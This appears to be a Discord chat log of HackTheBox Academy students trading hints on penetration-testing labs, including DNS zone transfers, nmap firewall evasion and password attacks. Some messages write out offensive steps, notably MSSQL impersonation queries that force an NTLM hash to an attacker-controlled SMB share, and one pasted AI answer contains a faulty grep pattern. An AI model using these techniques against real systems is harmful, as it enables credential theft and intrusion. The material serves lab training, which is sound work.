#modules

Tried w dig?

Nmap can also get the answer

" Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. "

Struggling here,, here is the command im running, and I am getting 40

Thank you

Hello, I'm working on the Active Subdomain Enumeration module -> Active Subdomain Enumeration. I edited the /etc/resolv.conf to have "nameserver <Target_IP>" and /etc/hosts to have "<Target_IP> ns.inlanefreight.htb". However when doing the nslookup I do not get a second DNS zone? I only see 1 NS and for the life of me I cannot find a second DNS zone. Is there something wrong with these two configs (resolv/hosts) or am I just blind? Could you please give me a hint?

This task requires performing several steps:

Install curl on your Pwnbox if it is not already installed.

Open the terminal and run the following command to retrieve the source code of the website:

javascript

curl https://www.inlanefreight.com/ > source_code.txt

Use grep or another text manipulation tool to filter the unique paths of the domain. For example, using grep:

bash

grep -o 'http[s]://[^"]' source_code.txt | sort | uniq > unique_paths.txt

To count the number of unique paths, you can use the wc (word count) command:

bash

wc -l unique_paths.txt

The output of this command will be the number of unique paths.

source: openai.com

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. This is the question

i did that one! I got the FQDN

Its the zones that are bugging me

Identify how many zones exist on the target nameserver

I did the remaining but i m not getting the first one

Oh then we can help each other i think?

Let's see

which one you stuck at?

The second one (Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.) and the third one (Find and submit the contents of the TXT record as the answer.). I can't seem to find the second zone?

i was in attacking comman services hard lab i used execute () function its not giving me any results so used EXEC command to open flag.txt in administrator desktop can any one figure out what's the problem

dig axfr <subdomain>.inlanefreight.htb @rustic sageAddress

but which subdomain do you enter there then?

u ll get a flag

Is that trial and error or did you know?

I mean you can go past all subdomains, but is that best practice?

AH I think I get it now

If you don't mind, I'd like to edit this one so I don't spoil for others, mind if I edit it?

yeah no worries

i am still not getting the first one

Wanna take it to DMs?

yeah

Hint: you don't need to count high

Hey I need some help in Footprinting module got stuck in DNS section couldn't find the answer of "Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. "

Dig?

I got some output through dig but none o them were right answer

Did you dig with the ns option?

Because that will tell you the nameserver(s)

It's probably more obvious than you're thinking it is

Oh let me check once

Thanks man It worked I just over complicated stuff as usual

Mhm if it's starting to look overly complicated always look back over your results

Attacking Web Applications with Ffuf
problem I'm facing is host is not resolving from my /etc/hosts file.
It works with any standard IP however as soon as i add the target IP to my /etc/hosts no one wants to resolve it.
I've tried multiple solutions however non of them works.
<standard IP> <name> works

<target IP> <academy.htb> doesn't

as a kicker as well I can't ping the target IP, I can grab a cURL from the raw IP however as soon as I assign it a DNS name in my /etc/hosts file then CURL doesnt want any of that

Then don't assign it a DNS name

If it works just raw why change it?

Are you meant to use a specific name?

because I need to access a subdomain on the same IP.
It's a module about VHOSTS and i require to access many names on one IP

Are you doing just the IP and not the port

I'am using the port as well tho

it almost sounds like the hostname is wrong and the webserver is rejecting it

^

Also you don't need port number in /etc/hosts

@fathom pendant hmmmmm..... interesting

let me test that out.

You specified the source port far after the --source-port

Try --source-port 53 then the rest

also rnd is not needed

Also did you just... Visit the IP?

:)

Also

-S

You don't need that

-S is telling nmap you want to spoof using the provided IP

That word is blocked: but yeah that is also it

You get access to the page/status.php iirc

Oh wait not the same thing

One sec

i wonder why crackmapexec couldn't crack the password but metasploit could..

Yeah no you get access to that page

I just looked at my notes for that one

I did this without nmap that's why lol

yo team... can somebody give me a hint on Attacking Common Services - Hard module please?

Maybe if you gave more context to your question

I have access to mssql and rdp of course but not able to continue as I didnt find a way to bruteforce passwords of found users or impersonate them... I also find a linked server but cannot check it

at the end I answer every question but last

hint ||mssql|| is the right path and one of the method you mentioned is also right so maybe re-check everything you have done or didn't worked

are you using sqsh as connection tool? Im not sure if mine work so well...

yep and i did try with impacket-mssqlclient both of them work fine for me

Hi

ok I will try again, I found 2 users and when I try to impersonate one of them dont work and I get an error message with the other user as user don't exists.. very strange. thx for the hint

Hi

np and if you still need help with that shoot me a dm with the error message

thx

Hi I'm new user please help me

with what?

With?

Ar u Hacker

Ah

One of these kids

this again

Hey

I'm confused

https://hackertyper.net/

Ho

some time i come there and try to read the code to see if any if it make sense 🤣

What's up kiddo just ask the question you're here for

hello all, can someone please point me to the right direction for getting the dns version in the medim lab for nmap? I am stuck with this command: sudo nmap -p 53 -sV 10.129.98.3 -sC -Pn -sU --source-port 53 and this result: 53/udp open domain NLnet Labs NSD

#modules message

I mean the version is there

Sorry

oh yeah i didn't have time to address this issue yet but if you are doing this through the vpn and you get nothing back (no flag) try it on the pwnbox

thanks a bunch!

This

Good night

I'm Bangladesh

Ok bye

it worked via pwnbox, thanks!

Refreshing your VPN connection can also get it to work (disconnect/reconnect)

can someone give me a nudge on Password Attacks Lab - Easy ?

You simply need the two lists that the module provides

i got the flag using wireshark on my personal box on vpn, so that's also an option

I mean the module doesn't talk about using Wireshark so that's why, using tools only given by the modules :)

I just reran it with one of the things I used and I got the flag in 3 things with nmap :D

not working ._.

yeah i was thinking "my nmap command should be working" and i opened up wireshark to verify my claim

DM

sent

almost.....

Gl

Go go go!

Hey guys!
Could anyone recommend me any modules that can help me in studying reverse engineering? As far as I've looked I don't think I've seen any that touch that stuff in the academy, but maybe I'm missing something?
If there are none in the academy can anyone recommend a good source to study from? Also, I want that source to dive as deep as possible so I can master my knowledge before going in and solving stuff from the HTB challenges.
Thanks in advance! 😊

I good starting point maybe asm learning ? 🙂

buffer overflow also

It is not reverse engineering but it can help to understand how a program works

I dont think theres really any geared for RE yet

the only module i can think of is Intro to Assembly Language

because the prerequisite for learning reverse engineering is knowing assembly

Will check it out, thank you!

Gotchu, makes sense hahah.
I'll start with that for now, thank you 😇

not sure if this will help but it's in #resources-tools so here
#resources-tools message

i'm not sure but you may need to verify to access that channel

hi everyone 🙂

has anyone done the blindsqlmodule? im trying to code a tool based on the module, but when I try to do a certain query and print it it errors out

they're not gonna be able to see that link; they'll need to verify their htb account in #bot-commands

its strange because the query to print out the flag works

but not the query to print a password

was wondering if anyone could advise 🙂

I got that too, but wasn't the right version., however, I think I use source-port 80, but still the answer still wrong.

do you know why they are telling you to use source-port 53? if not - re-go over the module

I just redid the module ran the same command I used previously and it worked just fine

no in Academy, just the Assembly one. However, once you know assembly, you can go the regular HTB site and do the RE challenges and look up any writeups people have done on some of them.

I got the flag in 3 ways looking at my command

but generally try in the pwnbox and you should get it

i forgot to mentioned that you may also want to look at anything malware analysis because it requires reversing the code. An old book that still good is the "Practical Malware Analysis". It is a red book with an Alien autopsy being done.

also look into John Hammond he regularly does content on Reverse Engineering Malware :) (using REMNUX, a Linux Distro focused on RE)

dont know, use source-port 80 because port 53 is being filtered and port 80 which is the http server has to access port 53 to resolve. But I go the same version for the DNS as Taylor, and that wasn't the right answer. What command do you use Marcie?

you need to suppress ICMP ping iirc

also disabled arp ping in my request

I ran this but didn't work

try using the right source port

also -sC isn't necessary

also do a packet trace

just to see what's going on

:)

shouldn't the source-port be 80? the hint says to look at that port.

should be source-port 53 as that entire module talks about

port 53 is dns port which defaults is trust as anything coming from that port is just trying to get transferred to/from another internal domain

note: i just ran it twice - modifying my command slightly

don't need to specify source port

I'm basically just shortening what I have until it works

this is also the one where they give you access to the http://<IP>/status.php

Hi everyone, i've a problem "skills assesments : Login brut force" Which file should we use ? ty

yeah using the shortest possible command I still get the answer; send me a DM because there might be something that's being overlooked

ok trying all variations of what I have: i would try disconnecting and reconnecting to the vpn; or resetting the target

as I adjusted my code multiple ways and variations

and even did --source-port 80

and was able to retrieve the flag

it didn't work.

it's getting a read timeout

don't know why.?, I'll try restarting the machine.

yeah refresh your vpn connection first

disconnect/reconnect

ok

or swap servers and connect to the new vpn connection

Struggling on Case #11 in 'Bypassing Web Application Protections' of Sqlmap Essentials module. The hint isn't helping. Can anyone assist this pleb?

shit!!, I got it. I ran the same command after changing the VPN server and re-downloaded the VPN file.

somehow that works, so it seems it was the server i was using.

potentially

I am blaming it on Gremlins

anyway GL with the hard!

I already did the hard one yesterday when I was tryiing to figure out this one, and got that one fast.

yeah

sometimes the "hard" labs seem easier

but it's usually because the "medium" labs already prepped us mentally for what to look for

that is for sure.

Currently on Password Attacks - Credential Hunting in Linux. I already got the users password, but only with the hint to help me get a first foothold. Can I get any help on what's the intended way of getting the first foothold? Think I have it, but godamn would this take forever this way

thank you

I used the hint, but then I tried to recreate the steps as if I didn't have it. You can guess the username from an Nmap scan, and the password is in the rockyou list; it took me 20 minutes to do a brute-force scan with hydra.

An persons can help me about Skills Assessment - Website ... I use good parameter with Hydra etc. But i cant to find the wordlist ... (Password). Ty

I was stuck on "Enumerate hostname" for nmap. I had to read more into the documentation. I think I got my answer. It just goes to show that sometimes you need to punch in a line of code and then grab a coffee while you are at it

im working on the IPMI footprinting and when using hashcat i get this error. "Initializing backend runtime for device #1...Illegal instruction" has anyone run into this? online forums seem to be unhelpful

i need help in common services hard lab

did any one completed

hint only ||1|| wordlist is needed for this

hey yall im on linux fun and i am doing the Service and Process Management i am trying to answer the question on what the unit name is of a service with "Load AppArmor profile etc... i have used the cmd systemctl list-units and have found that service and the unit name with it but when i put it into the answer i get it wrong

if you check in Seclist 2 out of 4 ||darkweb2017|| list have the right password

Can anyone please help me with 'Cracking passwords with hashcat' - Cracking Common Hashes section? I am getting MD2 for the hash but no MD2 mode for hashcat and I have tried only cracking for MD2 with no success. MD5 isn't working either and the hint of rule or hybrid mode isn't working either considering I am not sure of the mask.

no idea what you mean by that but the ||deep scan|| tag seem to work for me

what's the issue?

Well I did not want to give away any spoilers. I read the Nmap documentation to find the answer to solving the problem

hint for that the hash isn't MD* and i think something like hashid can give you the right hash type and also for this you will need a ||rule|| like the question said but to find this ||rule|| you basically have to blindly try everything until you get a hit

Im stuck on Module Getting started, the privilege escalation part. I have already identified which exploit to use however i ran into this issue, /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found, anyone knows what i have to do to get this fixed? like do i need to compile the exploit on an older glibc version on my attadck machine before transferring the exploit to the target machine?

#modules message

also no idea if that will work

hashid gives MD2 which isn't right, MD5 and MD4 haven't working either.

yeah that's the first 3 and none of it is right

there is an example command on that section for listing services you can just use that command and use the grep command with the given description in the question

@vital adder New problem

You do not have permission to use the bulk load statement.

i impersonated user john

so when i grep the description would it look like this... systemctl list-units | grep "Load AppArmor profile managed internally by snapd"

no idea about the permission thing because i didn't use bulk but hint wrong user

yes your grep command is right but your systemctl command is missing 1 tag (not sure if you even need that tag or not it's just in my note)

so that is the unit name correct

--type=service was that what was missing

i put that in already

i found it a different way lol way harder had to look through all the services lol

but when i put that unit name in it says im wrong

no idea why and also i got no note about this but try to remove the username ||admin:|| from the hash seem to fix it for me

yeah you may want to remove this because that's the right answer give the page a refresh or even a hard refresh and try again

no problem. i switched over to kali and hashcat works on it no problem

remove the pic

yeah a lot of people randomly have issue with this hash for what it seem like no reason

sometime it's work just fine with both hashcat and john but sometime it just don't for no reason and i just give it a try and it doesn't seem to work for me right now (on the pwnbox)

im just having issues with parrot.

that could be the issue

I ve try with ||b.gates|| and|| m.gates||... found on precedent exercice. I don't know

are you on the first or second question?

first

"When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag."

so yep my first hint still apply

and you don't need to find a ||username|| for this

So what username am I going to use ? :/ ..

hint you don't and there only 4 main section for this module so go back and check each one them for this

Hi

Hi

What #bloods means?

umm

Good morning

Im stuck on Module Getting started, the privilege escalation part. I have already identified which exploit to use however i ran into this issue, /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found, anyone knows what i have to do to get this fixed? like do i need to compile the exploit on an older glibc version on my attadck machine before transferring the exploit to the target machine?

can u help me out with the module called vulnerability assesment

how am i supposed to scan for the nessus activity

is there anyone online at the moment

......

.....

..

....

i know i miss someone in my last helping spree and i did double check no idea how tf i still missed your message but if you are in the Privilege Escalation section then hint you don't need to compile any thing but if you want to test newer PrivEsc exploit (which this target have) you can just compile it on your machine and transfer it to the target machine

can i pm u with what i found to avoid spoilers here?

@cunning void spamming isn't going to help rather just say what issue your are having (delete this the first time on accident)

sure

I'm confused because I am following the module exactly.

The command just kinda stops immediately

I needs help : (

i am just confused on how to do the activity they provided for nessus in the vulnerability assesment module

i thought they have nessus preinstalled in their server so i ssh-ed into it and i tried running the {systemctl start nessusd.service}

but it was not working

What section? should be straightforward

the version show in the example is 5.0.2dev and the version on the pwnbox is 5.4.1 (i think it's the latest) and it's seem to be working on my kali which is running version 5.2.2

So use a different version??? Like I'm really frustrated because the attacking common services module wasn't working, so i switched to the password attacks module lol

nessus skills assessment section

the latest crackmapexec have some dumb update one of them is when you dump the ntds in the dumped file they add some dumb account status stuff so if you want to use that to continue other stuff you have to filter the stupid status thing out which isn't that bat but it's annoying

So how should I go about using an older version?

both module are buggy and kinda old also a bit outdated 🤣

yes but if you can use it on a different machine like on your kali (if you have one) uninstall and re-install this type of tools is a nightmare

I don't want to set up a vm 🙄

like just make the damn modules work htb

i just download and use the pre-install vm from kali 🤣

Are these sections from password attacks (dumping Sam,lsasa,ntds,pass the hash, pass the ticket) are they exploitation or post exploitation or lateral movement phase

I haven't been able to make any CPTS progress recently cuz the modules have been buggy 😭

@raven cairn oh wait i'm dumb you can just install an old version of cme by overwrite the current one with:
sudo pip3 install 'crackmapexec>=5.2.2,<5.4.1' --force-reinstall

@shadow canopy lateral movement

Yo thanks funny internet squirrel

np also i can't remove my christmas hat because i can't find the original image without the hat 🤣 (i'm 100% sure it's still in my laptop some where)

Thanx

You need to RDP into it, not ssh, and for convenience sake, the scans were already done, you just need to navigate to the IP:8834 and then look for the stuff

I've also been resetting the box to make sure that things are working

yeah the dumb update in the new version is the only issue i can think of

also give me a sec i'll reset both my pwnbox and target and re-try every to see if it's still work

No problemo. I really appreciate the help : )

@raven cairn i just give it a try with basically the same thing with the install command and it's also working fine for me and i did have doubt about the command i send because when i was trying to install old crackmapexec i did run a bunch of command and didn't check which work i just send the last command i ran

and yep it's was the right command that install an old version of crackmapexec and that old version seem to be working fine for me

Ok now it works that I have created new pwnbox instance.

weird lol

It do be like that

yea my guess is you may broke something when trying do debug cme (if you did) but the pip install thing should overwrite the old one and install everything needed so that shouldn't be an issue

but like i said before the pwnbox (kinda) suck ass

Also is there a reason I am getting SMB errors?

So this is just a nice way to say I am dumb lol

Honestly idk

Documentation and Reporting module taking me so long lol Feel like my notes are like a novella compared to my more technical section notes. Hurts too that its boring but super critical info.

Like, I haven't ever seen this when I am using Smbclient but at this point I am not sure if I don't know what I am doing, or this section is broken.

Like dont get me wrong, its an absolutely amazing module and Im hella grateful its there. Its just also the complete antithesis of everything I find interesting and it musters all of my willpower to properly learn it.

whoever made the pivoting module i love him/her

I did, maybe so☺️

then i hate u

😹😹

Is it that difficult?

nah its one of the easiest modules i ever did but I HATE U cuz you used the gayest emoji that could ever exist on discord

Wtf! How was I supposed to know you're male?!

There are females here too, jsyk

They are just males in disguise: no such thing as females on the internet

Gosh! Sucha heartless MarcieLee

YEAH

So, if a lady becomes a hacker, she unknowingly becomes a man, really?

It's a running internet joke

Since way back when

Due to the presence of catfishing and stuff

havent seen a lady hacker in my entire life

Cope

btw are you preparing for cpts?

Yes

would u mind if i dm u?

Yes, I mind. :) Don't

alr then LMAO

Lol

Someone tell me about cpts

#cpts

marcie do you have oscp?

Nope

Is the CPTS a very valid certification as a Pentester

It's not widely industry recognized ATM; it's valid, but OSCP is still the HR dropper

I've seen quite a few pentest positions that say 'OSCP or equivalent', so while CPTS might not hit recruiter keywords yet, I'd expect that it'd probably be respected at any place you end up getting an interview.

I'd say CPTS surpasses OSCP from what people have said

Why do you think so?

More modern content that goes far more in depth in exploitation as well as having a much greater emphasis on methodology. It also has one of the best beginner into intermediate AD modules of any course. It more appropriately prepares you for the actual real life job of being a junior pentester.

Or at least thats been the general consensus so far

https://youtu.be/dRW1Gxmu__Q

https://youtu.be/UN5fTQtlKCc

So how much can we rate HTB with respect to its certifications?

Considering the main site has some contracts with companies and is certified as a CE service

So far people really like CPTS over its competition for its target skill levels, but its still too new for industry recognition

OSCP will help you land interviews, CPTS will help you pass interviews

Interesting perspective

But they don't cost the same

No, by far CPTS is cheaper. But price is not the same as quality

can someone give me a nudge on Password Attacks Lab - Hard ?

can someone give me a hint on where to find the SAM database? I tried many answers that I know and non of them is correct

Look in system

if you want to dump it you can also use crackmapexec

Thank you so much! I'll make sure to check those out, that seems very in-depth 💪

Can anyone give me a nudge on Attacking Common Services - Hard

i got john's pass but i dont know how to get the admin priv.

@brisk geode maybe i may help u

I did all the exercises but I have a problem with the first question which states "Where is the SAM database located in the Windows registry? (Format: **)"

dms?

@brisk geode yes

Isn’t it like C:\Windows\System32\somethingsomething?

@livid zephyr @fathom pendant actually this is one that I think I found already, but also great info!
There's a course in tryhackme, that focuses on malware analysis, so I'll take it.
Thank you 😊

can I dm you?

Yeah sure

The "Blind SQL Injections" module was very fun.

If you still need help, send me a DM

Hello guys! can i DM someone to get help with the Pivoting module? thanks 🙂

Glad you enjoyed

sure

Hi HTB dudes.
Hope you guys have a happy day!

I have questions regarding the markup box.
Why I couldn't get the ssh key of the Daniel machine after I ran the payload.
I got 200 ok responses from http request through burp suite.
Does anyone have a solution on this please share.
Big thanks 🙏

You always ask the same question and still in the wrong channel
#modules message

Maybe this will help you
https://medium.com/@joemcfarland/markup-has-been-pwned-e7c6e763d25f

Thanks for your reply. Yes I followed the scripts there. However I still have the same issues.

Any idea maybe this is the cause of the burp suite community edition?
Of the htb machine itself. Or the remote machine ?

Maybe someone in channel #boxes can help you

Planning to use vm just to see if my VM machine has the same result.

Finishing "Active Directory Enumeration & Attacks" feels so good. It was endless D:

How long did this module take you? I plan to start it soon

Like a week and a half. Also, I'm studying in parallel (aside from HTB) and that's why it took me more time. But it has many, many sections. Definitely takes more than 2 days (as supposed in the webpage)

yeah took me abt 10 days too

need help on enumeration with nmap module, service enumeration section.
I've enumrated and found all the services but idk how to proceed further

i've found the flag from one of the services but that is meant for a later part

I need with the getting started "privilege escalation second question I get to the ssh key and don't know what to then onwards

https://steflan-security.com/linux-privilege-escalation-exploiting-misconfigured-ssh-keys/

Which question are you in?

the last one

service enumeration section

"Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer."

this is the question

Try nc to the port you are interested in

You could also try with banner script of nmap

thanks

The times listed for each module assume you are spending 8 hours a day studying.

i spent way more than 16 hours on that module

granted I'm not super good at this but still

Password Attacks
Pass the Ticket (PtT) from Windows

Optional: Try to use both tools, Mimikatz and Rubeus, to perform the attacks without relying on each other. Mark DONE when finish.

i am able to do everything with mimikatz. however, i'm trying to use Rubeus. (Rubeus.exe dump /nowrap) the base64 output doesn't decode with cyberchef and online decoders
anyone know how to decode the strings

Even with 8 hours a day and assuming you are being formed through the Path it's impossible in 2 days if you really want to understand and test everything in that module. If you are a experienced pentester and you try that ok, "2 days". But for someone who's new there's no way to do that in 2 days. Also, 'not' being 2 days is not even a thing. I'm just saying that the webpage says 2 days but it's way longer than that

I agree. I'm just pointing out what the numbers are based on

Kerberos tickets are not human readable.

It won't look like it decoded properly no matter what you do

so (Rubeus.exe dump /nowrap) is to just extract info users,domain,etc

but how can i use the base64-string to pass the tick with Rubeus.exe

Can i get a nudge on network enumeration with nmap, firewall and ips/ids evasion medium lab?

Hi

Pivoting, Tunneling, and Port Forwarding>> ICMP Tunneling with SOCKS

any solution?

Anyone wish to nudge me in the right direction on Attacking Common Services - Easy lab?

How did you find the ilf_admin page?

Don't forget that TCP isn't the only type of communication 🙂

I was stuck on that one for a while too!

hello, can somebody tell me what is the IP address of academy.htb ?

That's not a "real" FQDN, i.e. it's only used for exercises. You can edit your hosts file to match the IP address of the exercise VM, but that address will be specific to your session.

Have you compiled the binaries?
$sudo ./autogen.sh

yeah i did

Maybe this tip will help:

I had the same issue, solved installing autoreconf:
sudo apt install autoreconf
https://forum.hackthebox.com/t/icmp-tunneling-with-ptunnel-ng/268732/8

hello, can somebody tell me what is the IP address of academy.htb ?
Can you look from /etc/hosts

I am stuck.

The top-level domain htb is not official and therefore cannot be resolved.
But you can enter the IP address of your target in the hosts file.

10.10.10.10 academy.htb

10.10.10.xxx

The IP of your target

do you know the port number ?

Can anyone tell me why running EternalRomance at the target host returns 'Exploit completed, but no session was created.'. The info only set RHOSTS, which I did as well. Why does the module have a remote session and I don't? I tried both exploits (the code and command version)

did you set LHOST?

I don't have that option (I checked options)

Payload options? Try both staged/stageless payloads

It's not under 'Basic Options'

i have: DBGTrace, Leakattempts, namedpipe, named_pipes, rhosts, rport, service (3 of em), share, smbdomain, smbpass, smbuser

Do i set LHOST in the options after 'use 0' for instance?

Where is #giveaway ?

is there an issue with the https://academy.hackthebox.com/module/77/section/843 module?

It was this, thank you! Why did it not say anything about this in the module lol

I can't enumerate anything on the port. Also there were not plugins install when I use wpscan

Just because wpscan does not find anything does not mean that there are no plugins installed. Look in the. Source code

right, I know what the webstie says when browsing it. The server's are not responding all the sudden.

i think you must be verified to see #giveaways

Alright thanks

Restart the Lab and try again

I did that is the 5th ip:port

restarted vpn

rebooting my kali vm.

You do not need a VPN for this address

try enumerating version numbers

||Wordpress 5.6.1|| then ||Simple Backup Plugin 2.7.10 || ||twenontwenty theme||

search for public exploits with these infomation

hi guys

i am new here

goodevening, during a box I encountered a vhd file encrypted with bitlocker, I cracked it but the question is how can mount such a file. I tried to follow a guide using guestmount but that brought me no mount.

||wp_simple_backup_file_read||

I was just having issues with the server. Would not work, thought there might be an outage

https://itsfoss.com/mount-encrypted-windows-partition-linux/

Hi, could anyone give me a hint for the module "Attacking Common Services - Hard". I've gained access to ||fiona and have mssql, but when I try to execute hash stealing as john (impersonating) I'm getting stuck, I've tried responder and impacket's smb server ||

||[] Incoming connection (10.129.203.10,49703)
[] AUTHENTICATE_MESSAGE (,WIN-HARD)
[] User WIN-HARD\ authenticated successfully
[] :::00::aaaaaaaaaaaaaaaa
[] Closing down connection (10.129.203.10,49703)
[] Remaining connections []||

This is the query:
||EXECUTE AS LOGIN = 'john' EXEC master..xp_subdirs '\10.10.15.95\share'||
||EXECUTE AS LOGIN = 'john' EXEC master..xp_dirtree '\10.10.15.95\share'||

@acoustic owl @cinder mortar thank you

Have you found the || linked server? ||

i didnt read

yes, but i'm getting ||[-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: Linked servers cannot be used under impersonation without a mapping for the impersonated login.||

sounds like youre not using appropriate creda

Oh I used the wrong connection for the ||linked server||
did this
||EXECUTE AS LOGIN = 'john' EXECUTE('EXEC master..xp_subdirs ''\10.10.15.95\share''') AT [WINSRV02/SQLEXPRESS]||

instead of
||EXECUTE AS LOGIN = 'john' EXECUTE('EXEC master..xp_subdirs ''\10.10.15.95\share''') AT [LOCAL.TEST.LINKED.SRV]||

But still struggling with|| no hashes on the responder||

Module Pivoting, Tunneling,and Port Forwarding'Skills Assessment. I need help on question 5, i have the creds for user vfrank but when I connect to 172.16.6.35 i get nothing. can someone help me out? thanks

You're looking for another host to connect to using vfrank creds

hi @storm jackal can i dm you about the Pivoting, Tunneling, and Port Forwarding module?

yeah

You can't intercept a hash with responder in this lesson

So I'm trying to do the linux fundamentals. I'm connected to the VPN and can ping the target machine, but when I try to SSH to it nothing happens until it tells me my connection timed out.

using web proxies, Intercepting Responses
where can i change the type. in burp itself or with the help of the devloper tools? i tried both but did'nt find out yet...

Ey! I am a bit stuck: In the Footprinting module under DNS we are suppose to:interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

I have tried every type of DNS lookup with DIG from an A record to a SOA. I assumed I would find the FQDN in an A record, but there is nothing that looks like a FQDN, any advice?

What do you mean by "change the type"?

i should change the type from number to text...but i cant write override it in burp and neither with the devloper tools

like, in a request?

you want to modify a request?

If you want to modify a request, in burp do the following:
right click on the request you want to modify and click "send to repeater"
Go to the "repeater tab", here you are able to modify the request and send it by clicking "send"

You can't efficently do it with dev tools, but you can download insomnia, right click the request in dev tools > networking and click "copy as CURL" then paste it into insomnia

yes normaly when i work with burp i do exactly as you sad. send it to the repeater and than modify the request and send it again

and that worked? 🙂

but here i would have to modify the response...u know what i mean

You can't modify the response, you are not the server

You can only modify requests and send those

and how i do that?

OOO now I see you question, you want to modify the HTML source code in your browser

Open dev tools and go to "inspector", now double click on the field you want to change, it should highlight and you should be able to write whatever you want

looks like a potential injection to me. Try inserting values on the page, but before you click the submit button on the web page, make sure your burp is set to intercept the requests. Then when you capture it, you can modify it.

funny it works in every browser but not in the browser provided by burp...
thanks for your help.

aaaa, I never use the burp browser so it didn't strike me that you where using it 😛 np, happy hacking!

To list the DNS servers of a domain, there is another command. Not dig A but dig || NS ||

Hi, I have just started hackthebox I am at the starting point, and when I launch my machine on the kali terminal, it is not the same IP as the one on the HTB machine. If anyone can help me please

ty! already found the answer 🙂

Not sure what you mean? The target machine shouldn't have the same IP as your tun0 address

I've found some tables with creds, but that also got me nowhere for now but will keep on, thanks for the hint, since I wont be wasting any more time with the responder
||b'patric' b'password' b'user'
b'julio' b'password' b'admin' ||

so if I understand correctly, when you run ifconfig in the terminal, the IP address that appears is not the same as the one targeted on htb

Cheers, pwned

Struggling really hard with SQLMap Essentials - Bypassing Web Application Protections: Case#11. Can I pm someone or someone pm me for help? Tried so many different flags and variations with '--tamper=', but nothing is returning.

pff that pasword - Hard is really hard. Found a SAM and System, dumped the hashes and cannot manage to login with pass the hash. really slamming my head into the desk now.

tomorrow i will try if invoke the hash works...

been finding the entire password module a thing of extremes. it's either super obvious and just follow along with the content, or "here's a brick wall. try to break it with your face"

ahw man losing much time on that hard machine

It shouldn't be

yes I understood and it works well thx

Hello everyone, someone was able to crack the root hash on
Password Attacks - Passwd, Shadow & Opasswd Module?

Probably

Anyone have trouble with the answer syntax on Footprinting - Host Based Enumeration - SMB exercise questions 1 and 6?
1.) What version of the SMB server is running on the target system? Submit the entire banner as the answer.
6.) What is the full system path of that specific share?

I'm confident that I've found the information required for the questions, but I can't seem to format it correctly for submission.

Got 6.. had an extra / at the end lol

Still stuck on 1 tho?

I got it 🙃 lol TIL... when service scanning for SMB, do ports 135,139,445 not just 139,445

Is this error with smbclient normal? (password attacks module - Network section)

I think ls is the wrong command.. try dir

Dir gives me the same error

Recent pwnbox updates might have screwed some stuff up but I am not sure

That's odd ya one of those two should work

I don't really have a virtual machine and it's hard for me to set one up cuz I am at the university all day and I don't think I can set up kali on those computers

I was having some issues with pwnbox earlier today too. I was luckily able to utilize a VM though

Hi!

Hello. Welcome to hackthebox. Have you had a chance to checkout #rules ?

Yes, I've been here for days now, but I'm hardly talking hehe

I'm having trouble with the footprinting DNS module, I've tried most of the word lists now but both the target and the pwn box expire before the enumeration completes, I'm starting to get frustrated

Sweet!

If you need help with any modules lmk

Thx 💖

i forgot what the shares with the $ exactly is but it's windows default stuff so you can't access those share

I haven't been able to access any of the shares shown with CME tho

oh yeah i forgot this section is a bit messy and kinda buggy let me do some test or find my old note on this stuff and i'll get back to you but some user may have some thing that you just can't access because it's all on the same box

Could someone point me in the right direction with DNS footprinting please

if you use the tool show in the example and one of the bigger wordlist in seclist you should be good also hint running the tool on the ||main domain|| is the ||wrong path||

Someone for "Active Directory Enumeration & Attacks" part "Privileged Access" ? have a question

sure what's the question?

Right it's a Host key word being Host

@raven cairn ok yep i just give it a quick try and it seem like ||all valid user|| have the same share but only the "right" user have access to it (the user for the smb question) and this is kinda dumb but if you want to find it with cme just use the --continue-on-success and don't use the given username list for this

I swear I can read 🤦‍♂️

Module: Password Attacks
Section: Password Attacks Lab - Hard
Issue: I've found the || .vhd || file and tried smbmap to 'get' however the transfer is taking a significant amount of time i.e. - I ran the transfer overnight and it was only half done when I checked. Are there efficient alternative methods to download the file to || mount, enumerate and crack offline ||

How can I establish a foothold onto Attacking Common Services - HARD ? Ive been testing against rdp & the mssql services mainly utilizing my least favorite method "Brute forcing"...using the resources give & rockyou...yet no luck. Any Guidance?

Like this?

nope you still need a username wordlist (not the given one) so hint you have to ||make your own||

hint enum

try with the pwnbox and i'm not sure but i think you should be able to mount the share as a drive on your machine but no idea if you can run tools against it that way

Cheers, I'll check it out

oh wait a sec why tf are you using smbmap?

no idea if you can download file with that tool or smbclient will download it faster but just use smbclient

smbclient threw an error, tried a couple of times. looked around for help and someone suggested smbmap, it at least progressed past the error. I'll try smbclient in my VM again and if not I'll explore using the pwnbox

Hint still went over my head... Enum What? Im drawing blanks against what ive tried

also if you don't want to brute force (with 2 wordlist), since you should have access to the target machine you can just compare the ||share name|| with ||some user||

did you scan the target machine? hint ||smb||

if you are doing this on your machine the file have to go through a vpn and that will make it slow as hell but if you are doing this on the pwnbox it's should be super quick because both the pwnbox and the target machine is in the same network

Makes total sense, smbclient timeout again so I'll fire up the pwnbox and give it a go

Hi, kinda stupid question but I was reading the Using Web Proxies module, in particular the Proxying Tools section and I can't get nmap to work with burp, I've tried both with --proxies http://127.0.0.1:8080 and with proxychains but no requests shows up on burp. proxychains works both with curl and metasploit

I did but i didnt see smb 0.0 ill rest and scan again

Oh. That was very sneaky of the authors. 🤣

proxychains is a routing tool so basically it's route traffic through a proxy server and burp just stay in the middle to listing and log stuff so if you are trying to get proxychains to work with burp that's kinda dumb and i'm not sure if burp can listing and log the traffic from nmap because burp is only for web stuff but i think it should

but wireshark is a much much better thing to use if you want to log nmap traffic then burp

Now on to the password mutations section 💀

This section needs to be updated so badly : (

yeah I thought about that too I was just doing it to follow the module but I just didn't understand why it didn't work on my computer but it does in the module example

I guess it's because they work on different layers

Thankyou @vital adder

I cant post in help area

I am having trouble connecting to starting point vpn, Ive been trying for 2 days to connect and i get the same error everytime,

" $Option error: In [CMD-LINE]:1: Error opening configuration file: " thats the error in my terminal when I try to connect

